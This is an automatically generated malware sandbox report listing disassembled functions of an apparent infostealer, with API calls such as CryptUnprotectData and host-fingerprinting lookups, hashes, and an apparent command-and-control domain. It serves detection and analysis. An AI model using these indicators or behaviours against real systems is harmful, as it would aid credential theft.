Instruction ID: 106fc45ad3404cda282eaa32535b81ccc0e8128c77ede95de355203d1d43b79a
Opcode Fuzzy Hash: 4b54decef5b36cd588d2dbc9a87a4afe110f140ad871a0f396ba4e0a0775b21e
Instruction Fuzzy Hash: 0461A3B04497848FE760EF68D58978FBBE0BB85304F00892EE5D88B251D7B85458DF4B

Function 00408740 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 228
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 00408764
GetCurrentThreadId.KERNEL32 ref: 0040876E
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004087C0
GetForegroundWindow.USER32 ref: 0040884A
ExitProcess.KERNEL32 ref: 00408A04

Strings

b/7, xrefs: 00408794

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID: b/7
API String ID: 4063528623-2085417233
Opcode ID: 183a38287acbdcb6fd43605bfd40e65d67f3e3b4632bc5cfca641c35649d64ef
Instruction ID: 0d5a416f21ca3bcde6c043f2d710c8a16f1e6c6a059847071c546a7df00bc279
Opcode Fuzzy Hash: 183a38287acbdcb6fd43605bfd40e65d67f3e3b4632bc5cfca641c35649d64ef
Instruction Fuzzy Hash: EF71FB73A043154BC318EF79CD8576AF6D6ABC5320F0A863DE5C4A73D1EA7898048B85

Function 0040D690 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 329
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00436590: GetSystemMetrics.USER32 ref: 004365D0
Part of subcall function 00436590: GetSystemMetrics.USER32 ref: 004365E0
Part of subcall function 00436590: DeleteObject.GDI32 ref: 00436623
Part of subcall function 00436590: SelectObject.GDI32 ref: 00436673
Part of subcall function 00436590: SelectObject.GDI32 ref: 004366CA
Part of subcall function 00436590: DeleteObject.GDI32 ref: 004366F8

CoUninitialize.COMBASE ref: 0040D6A0

Strings

sobrattyeu.bond, xrefs: 0040D9EF
TC03, xrefs: 0040D75D
SD, xrefs: 0040D8B8
^_/C, xrefs: 0040D756
;d, xrefs: 0040D8B1

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID: Object$DeleteMetricsSelectSystem$Uninitialize
String ID: ;d$SD$TC03$^_/C$sobrattyeu.bond
API String ID: 1556769885-349980508
Opcode ID: 2812e617d036c375e3da603f544641752ab874253ccd01004949b5816314b26e
Instruction ID: 40ffb7c8dda840b4bdf12d856fc54da81b6c6fcd26267cd1a4ca77b1afe074d2
Opcode Fuzzy Hash: 2812e617d036c375e3da603f544641752ab874253ccd01004949b5816314b26e
Instruction Fuzzy Hash: 0DA1F6B56047918FD719CF39C4A0262BFE1FFA7314B28819DC0D64BB86D739A406CB99

Function 00420440 Relevance: 6.7, Strings: 5, Instructions: 435
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

}, xrefs: 00420953
y, xrefs: 0042094E
!@, xrefs: 00420473
,, xrefs: 004208BE
~, xrefs: 00420958

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID: AllocateHeap
String ID: !@$,$y$}$~
API String ID: 1279760036-3044378546
Opcode ID: 554deacf8bc337da0981443a9ba3dfb598271926dd3bb08e90b684b7f9f9011f
Instruction ID: 2852e8a72792478206081eee7b36556700343e18317fd051797439900b6cc18e
Opcode Fuzzy Hash: 554deacf8bc337da0981443a9ba3dfb598271926dd3bb08e90b684b7f9f9011f
Instruction Fuzzy Hash: 20029C7160C3508FD3249F29D48436FBBE1AB85314F948A2EE1D6873D2D7B99885CB4B

Function 0042DEE5 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 437
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042EDAD

Strings

'5%s, xrefs: 0042EE1F
$qk, xrefs: 0042ED38

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: $qk$'5%s
API String ID: 3960555810-1674721824
Opcode ID: 1bf49ac190f8508b2fffc7c03ebbba4de731e985bda5682ac35f640f532f0e98
Instruction ID: 77e35e584cd91eb5155daa22bb8d7f3faef11dd04174e3cb06e18610c7d197b5
Opcode Fuzzy Hash: 1bf49ac190f8508b2fffc7c03ebbba4de731e985bda5682ac35f640f532f0e98
Instruction Fuzzy Hash: C6D1D4716047428FD719CF2AC491762FBE2BF96300B2DC5AEC4DA8B752D739A806CB54

Function 0042ECD0 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 370
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042EDAD

Strings

'5%s, xrefs: 0042EE1F
$qk, xrefs: 0042ED38

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: $qk$'5%s
API String ID: 3960555810-1674721824
Opcode ID: 937cf4f40fa33fa539c53bab1cbec55eb70b2128064d8ef1c103061abfc67558
Instruction ID: 774d1c6582b6df23f03d333cf1ee8e77294ae5f4637bee10b1881aef683745b3
Opcode Fuzzy Hash: 937cf4f40fa33fa539c53bab1cbec55eb70b2128064d8ef1c103061abfc67558
Instruction Fuzzy Hash: A4B1E1716047428BD719CF2AC450362FBE2BFA6300F6DC5AEC4DA8B752D739A846CB54

Function 0040CB44 Relevance: 3.0, APIs: 2, Instructions: 30
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CB56
CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CB72

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: 8656cd1a9d74df869ad8f22be8c3fd88ccb0ea15f397b936d6b69d150d3e7ac9
Instruction ID: ff61b9231b5af6c48cb1d82934a630ea8aeeaa7d7eb1477661cb3efef4af383c
Opcode Fuzzy Hash: 8656cd1a9d74df869ad8f22be8c3fd88ccb0ea15f397b936d6b69d150d3e7ac9
Instruction Fuzzy Hash: 72E0BD383C83007BF6398B08AC97F247221A743F22F301214B3623E2E58AE07140451D

Function 00410446 Relevance: 2.4, APIs: 1, Instructions: 941
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29e7d69098086101bbac799b7b35378752f7b542f599ed17af3bf933a101616b
Instruction ID: fd6d0c28c0521a4b2d3ba0d2fcd6f101c3ce844309344171b6c888af52a4c48d
Opcode Fuzzy Hash: 29e7d69098086101bbac799b7b35378752f7b542f599ed17af3bf933a101616b
Instruction Fuzzy Hash: F5821975A04B408FD714DF38C985396BBE2AF85324F198A3DD4EB877D2E678A445CB02

Function 00418404 Relevance: 1.7, APIs: 1, Instructions: 200encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004183F3

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID: CryptDataUnprotect
String ID:
API String ID: 834300711-0
Opcode ID: a27188761cfd85d7ec1f0333a8f51a54ad9e0068bdc24ba5bb72e93f216a39f0
Instruction ID: 5b988ee3757d9e29ab9f296af5c767d3f7ba0e13420727c7ac46e6bec5acf77a
Opcode Fuzzy Hash: a27188761cfd85d7ec1f0333a8f51a54ad9e0068bdc24ba5bb72e93f216a39f0
Instruction Fuzzy Hash: 115134716446025FCB19CF29CCC1687BBE2FB89304F19806ED8999F357EA79E8438744

Function 00427A50 Relevance: 1.7, Strings: 1, Instructions: 403COMMON

Download Yara Rule

Strings

klm", xrefs: 00427B31

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID: InitializeThunk
String ID: klm"
API String ID: 2994545307-2308819284
Opcode ID: a25c1e98b60485462dc98a4d52786a884c618e57296232dbe7681567e15a77d3
Instruction ID: 8789bd8e5de170319836c8e6b4e836532e50f116dbbdcba0dddf1708612731d7
Opcode Fuzzy Hash: a25c1e98b60485462dc98a4d52786a884c618e57296232dbe7681567e15a77d3
Instruction Fuzzy Hash: 8EB15A7270C3618BE7188F39E84167BB791EF95314F99862ED48597381D378EC0683DA

Function 004182C0 Relevance: 1.6, APIs: 1, Instructions: 112encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004183F3

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID: CryptDataUnprotect
String ID:
API String ID: 834300711-0
Opcode ID: 3596b27b00a398139ab61b9a9f2493e04994ff2f57b15bf561d8312ee2136e43
Instruction ID: 877a3ec0fd1df911aac285de86fc99df006a5b0b03a90c59e71951ea2dd66968
Opcode Fuzzy Hash: 3596b27b00a398139ab61b9a9f2493e04994ff2f57b15bf561d8312ee2136e43
Instruction Fuzzy Hash: 343128B5900B419FC7308F29CC84766BBE2BF55304F19496EE46ACB761D739E881CB44

Function 00415D15 Relevance: 1.6, APIs: 1, Instructions: 58encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004183F3

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID: CryptDataUnprotect
String ID:
API String ID: 834300711-0
Opcode ID: ff18997f2262789df2a28c237525f6ee7240e02b4e0992baaa5df85b8d22fe65
Instruction ID: 1a59348ec05e7f56259579615360e9f91351b56b2fbfb5c12ef62eceb2dabcd0
Opcode Fuzzy Hash: ff18997f2262789df2a28c237525f6ee7240e02b4e0992baaa5df85b8d22fe65
Instruction Fuzzy Hash: 8111E3B59006419FC7248F25CC84BA6B7E2BF55704F29892ED86ACB761D73AF881CB44

Function 004402D0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(00443370,?,00000018,?,?,00000018,?,?,?), ref: 004402FE

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 0042F195 Relevance: 1.4, Strings: 1, Instructions: 190COMMON

Download Yara Rule

Strings

h~BL, xrefs: 0042F30E

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID:
String ID: h~BL
API String ID: 0-1016882582
Opcode ID: 2353f16c686568adc0586de7d1e93e01bd2d2aed02e5eac9b0619ca2789dfc7a
Instruction ID: d310ecfdec240870e155c2d86c43ce513ec1b225dc1c5596defbf7cef2baff88
Opcode Fuzzy Hash: 2353f16c686568adc0586de7d1e93e01bd2d2aed02e5eac9b0619ca2789dfc7a
Instruction Fuzzy Hash: 90517D35355742CBD714CA28C4D0362BBA2DFA7310B9883BEC5958B7C6C32D980AD765

Function 0040BA29 Relevance: 1.3, Strings: 1, Instructions: 84COMMON

Download Yara Rule

Strings

WT, xrefs: 0040BA88

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID:
String ID: WT
API String ID: 0-3626323073
Opcode ID: c98c440a951f3e80385427973262f6473fe4faebb6d8defc51fc15df456e7494
Instruction ID: 7fe90350ce32cbd7e95176aa356467c42c1670bfe7b117e2a0000bb4fcdc20cd
Opcode Fuzzy Hash: c98c440a951f3e80385427973262f6473fe4faebb6d8defc51fc15df456e7494
Instruction Fuzzy Hash: 27213A766083408FC7288F24C89066BF7E2EFC6318F19891DD69717685DB75A806CF8A

Function 00415975 Relevance: .5, Instructions: 524COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2d82591e91d10e09f68e4e62c6a1b274d23b673b58491adfe2bed0ec565945a
Instruction ID: 74a6effee417382a1a5ee657c987477b534f3e8da231505bdffe7cb23820d89a
Opcode Fuzzy Hash: e2d82591e91d10e09f68e4e62c6a1b274d23b673b58491adfe2bed0ec565945a
Instruction Fuzzy Hash: 93022175608601CFD7248F24C8816A773F1FF89318B18857EE96A8B7A1E739F842CB55

Function 00442460 Relevance: .3, Instructions: 317COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 89ab3f1be10696e4686676121cb5646f329c94f14f9f75f0b417905d0925eb00
Instruction ID: 43641b0080f28784645b742a7ad2c42294f4f9943e41220fa131c894d675aac7
Opcode Fuzzy Hash: 89ab3f1be10696e4686676121cb5646f329c94f14f9f75f0b417905d0925eb00
Instruction Fuzzy Hash: 4AA177366083028BD314DF28C99056BB7E2EFD5720F59863EE89597391DB78DC01CB96

Function 00442DE0 Relevance: .3, Instructions: 296COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: aa586c2c0759b266de9262f8240903d80018af3b36a19caac19472dee2b72fdf
Instruction ID: bb37cd5a5ec90571467f2d819b8aa1c05cb322f86de6a72c59221bb73edef1ff
Opcode Fuzzy Hash: aa586c2c0759b266de9262f8240903d80018af3b36a19caac19472dee2b72fdf
Instruction Fuzzy Hash: 0D8189316083108BE7189F29DC8157BB7A2EBC5324F29863DF996473D5DBB4DC068786

Function 00440A0D Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: dabd88d03abec76c668a24312a925fda9f82045ef69a88c7f2ce8900658708d5
Instruction ID: c528c2ca4be2e476e1abc7d903b0acb0bac1af5d968177d182933651f6946a82
Opcode Fuzzy Hash: dabd88d03abec76c668a24312a925fda9f82045ef69a88c7f2ce8900658708d5
Instruction Fuzzy Hash: F561F871A002218BDB18CF64C89177BB7B2FF99314F0A826DD646AB3A5D7799C01C798

Function 0042D420 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8448f84bcdf5387fdb1ade7f916e006b21cd764feeb9d4c242b6861ef5379a18
Instruction ID: 8f228e5e5a1e4a0df9a7232996a6af5781287942daa8e57b9f502877da121123
Opcode Fuzzy Hash: 8448f84bcdf5387fdb1ade7f916e006b21cd764feeb9d4c242b6861ef5379a18
Instruction Fuzzy Hash: 4F312735B406428BE7298F29D850332FBA3EF96324B2C825DD1D1577E6D778EC42C644

Function 0040C9A6 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 114
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeEx.OLE32(00000000,00000002), ref: 0040C9AA
CoInitializeEx.COMBASE(00000000,00000002), ref: 0040CADC

Strings

i., xrefs: 0040CAE2

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID: Initialize
String ID: i.
API String ID: 2538663250-1725878519
Opcode ID: e8f144b0d0e578520ae92d650570c968faa3f50811db07706bb9956ac234a523
Instruction ID: ba51fcffb96049ba4a9d2ecb0e51bddf3b28327b6748284e76850d605b8acc93
Opcode Fuzzy Hash: e8f144b0d0e578520ae92d650570c968faa3f50811db07706bb9956ac234a523
Instruction Fuzzy Hash: 0F41C9B4810B40AFD370EF39D94B7127EB8AB05250F504B1DF9E6866D4E631A4198BD7

Function 0042F3C5 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 0042F4FE

Strings

ABQH, xrefs: 0042F482

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID: ComputerName
String ID: ABQH
API String ID: 3545744682-2857704541
Opcode ID: 21a26049c95029f14debd43ff901fc75587960d99a2a052f20e81db94443e019
Instruction ID: 5b9f06d29d21be6fc1f49ae5373236c4f88bea70ce57d6927e68f4d7a729ffcc
Opcode Fuzzy Hash: 21a26049c95029f14debd43ff901fc75587960d99a2a052f20e81db94443e019
Instruction Fuzzy Hash: CC3126742046928FD715CF24D890663BBF2EF66314F14816DD4E21BB42C379685ACBA5

Function 004406A2 Relevance: 3.0, APIs: 2, Instructions: 14
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetForegroundWindow.USER32 ref: 004406A2
GetForegroundWindow.USER32 ref: 004406B1

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: cd25495a08ae7a881a864ea32b03c02376aebc77bdf23d09393fa069b7b014e1
Instruction ID: ab39d18eea59de8c0b680b80bbae726c1476b453b8e9e2f579cb72a53367ea8f
Opcode Fuzzy Hash: cd25495a08ae7a881a864ea32b03c02376aebc77bdf23d09393fa069b7b014e1
Instruction Fuzzy Hash: 4AD0C7F95905018FD705D771BD8542A36397A4620D38C903DF50741613FD35502A8B5B

Function 00432D44 Relevance: 1.6, APIs: 1, Instructions: 94COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 00432D68

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID: InitVariant
String ID:
API String ID: 1927566239-0
Opcode ID: abb8198e76b9dbc638f6b64f0f056e50e4a5a60b888bb2a26f00c9e297661d1a
Instruction ID: f7f883e2ad49da0fecad536576301c807aa78c4ca5f2a4f40745664147204c84
Opcode Fuzzy Hash: abb8198e76b9dbc638f6b64f0f056e50e4a5a60b888bb2a26f00c9e297661d1a
Instruction Fuzzy Hash: 0A414F70108BC08EE365CB38C598757BFE16B56308F48489DD5D68BB92C7BAB509CB62

Function 0042F596 Relevance: 1.6, APIs: 1, Instructions: 75COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 0042F62E

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: bef4936573cb1b14369d8eaac4f9090ae5688f478e73a6ad368257c6db6403fa
Instruction ID: 76e407ce98a51277e7cb13f46241631caeedb7dd1d9a2c9078d1ba909d45b5aa
Opcode Fuzzy Hash: bef4936573cb1b14369d8eaac4f9090ae5688f478e73a6ad368257c6db6403fa
Instruction Fuzzy Hash: 122190742046928BEB158F25D4617B3BBE1EF53300F6885AAD4C69B392D7389C86CB64

Function 0042F586 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 0042F62E

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: 2a2e06b06b06b3c81bc5c5135b626a7c0281056ffdb54b32e1af479912c1722b
Instruction ID: d9a4f91a2702334bf36e07a4eed7b442d690e9a594b68c6ebc6cd94c5554eabc
Opcode Fuzzy Hash: 2a2e06b06b06b3c81bc5c5135b626a7c0281056ffdb54b32e1af479912c1722b
Instruction Fuzzy Hash: 7A11A1742046428BEB058F24D8A1BB7BBF2EF56300F5885A9D196DB392D738DC86CB54

Function 0043AA74 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GetUserDefaultUILanguage.KERNELBASE ref: 0043AAAF

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID: DefaultLanguageUser
String ID:
API String ID: 95929093-0
Opcode ID: c63114d8942900f552c7ab432bca405393180debf0d13cc5872ecb3af4bd1074
Instruction ID: 2db82b081659a11ebf0adced019d600d4025aec70a5b2eba15313fbfae0b0d52
Opcode Fuzzy Hash: c63114d8942900f552c7ab432bca405393180debf0d13cc5872ecb3af4bd1074
Instruction Fuzzy Hash: B0112636A482A58FD719DB3CCA4476DBFA26F8A300F0980ADC4C997385CB789D60C753

Function 00440260 Relevance: 1.5, APIs: 1, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,?,0040B51C,00000000,00000001), ref: 00440292

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 62298e30a4241653b6984ab1444618431f42e0cdb861d2290b65488c60bec4cd
Instruction ID: 9d73e3fc9da24b4a25dc6ea464106973b4d99c6e73c38ef93f1a8f1a834cd47d
Opcode Fuzzy Hash: 62298e30a4241653b6984ab1444618431f42e0cdb861d2290b65488c60bec4cd
Instruction Fuzzy Hash: EFF0203A909200EBE2006F2ABC05A173668BF8A325F020876F000D31A5D738E8218A9B

Function 004358EF Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 0043593A

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 6d4444b6b1bf2a15e57e1771f38e3a021ca3fddd5c8aadccf2c8c010083366ee
Instruction ID: 3c134e449782a57cf71f1962354a437f9829e02efeb86ae6b61234eae4da8937
Opcode Fuzzy Hash: 6d4444b6b1bf2a15e57e1771f38e3a021ca3fddd5c8aadccf2c8c010083366ee
Instruction Fuzzy Hash: 62F0ED752097028FE300CF24C59874BBBF2BB88304F25891CE4A44B394D7B9AA49CFC2

Function 00432648 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 00432696

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 2e53f1206323ee2cade14c3224eb0fa84b417d36bb7d5e7098e7bca86b682ba1
Instruction ID: 64921bb5e8d0d2665883c7be70a8893bafea9755363c5f099f224ef3642789f1
Opcode Fuzzy Hash: 2e53f1206323ee2cade14c3224eb0fa84b417d36bb7d5e7098e7bca86b682ba1
Instruction Fuzzy Hash: 29F07AB4109701CFE311DF64C5A4B5ABBF0FB85304F11985CE4958B3A1D7B59A49CF92

Function 0043E860 Relevance: 1.5, APIs: 1, Instructions: 22memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000,?,004402AB,?,0040B51C,00000000,00000001), ref: 0043E87E

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: d4ba0eb0295cb291fecaea3e71dbbc32e179608d3b32058e4b112bc51f780ac0
Instruction ID: edab8ee5216d5c962334db0beb90db3a31f2e897247f77843e17d527c4ab1b3a
Opcode Fuzzy Hash: d4ba0eb0295cb291fecaea3e71dbbc32e179608d3b32058e4b112bc51f780ac0
Instruction Fuzzy Hash: F0D0A734188121DFD7005F14FC05B873758DF0A351F020872B404AB1B5C234EC50C69C

Function 0043E840 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?,67660564,00408969,67660564), ref: 0043E850

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 3bcc0ae032fcfa855b4001ec6a7ed76c7c2836dbd2700616eddc664b251f816c
Instruction ID: 1c12cdc91dcc22cd6618a30bc84945b256d08a32317763a8f107efb347479c5b
Opcode Fuzzy Hash: 3bcc0ae032fcfa855b4001ec6a7ed76c7c2836dbd2700616eddc664b251f816c
Instruction Fuzzy Hash: E4C09B31145120ABD5103F15FC05FC67F64DF45391F010465B00467076C760BC91C6DD

Non-executed Functions

